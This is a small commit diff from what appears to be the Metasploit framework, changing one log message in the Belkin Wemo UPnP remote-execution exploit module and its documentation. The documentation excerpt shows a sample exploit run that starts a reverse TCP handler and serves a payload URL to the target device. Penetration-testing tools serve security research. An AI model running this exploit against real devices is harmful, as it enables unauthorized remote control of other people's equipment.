Land #11516, reverted print for Wemo exploit

This commit is contained in:
William Vu
2019-03-04 18:24:42 -06:00
2 changed files with 2 additions and 2 deletions
@@ -32,7 +32,7 @@ for Crock-Pot and 49153 for other devices.
msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > run
[*] Started reverse TCP handler on 10.22.22.4:4444
[*] Wemo-enabled device detected
[+] Wemo-enabled device detected
[*] Found firmware version: 2.00.6461
[*] 10.22.22.1:49152 - The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/CKgRyLqQZtBY6
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
return checkcode
end
vprint_status('Wemo-enabled device detected')
vprint_good('Wemo-enabled device detected')
checkcode = CheckCode::Detected
version = (v = res.get_xml_document.at('firmwareVersion')&.text) &&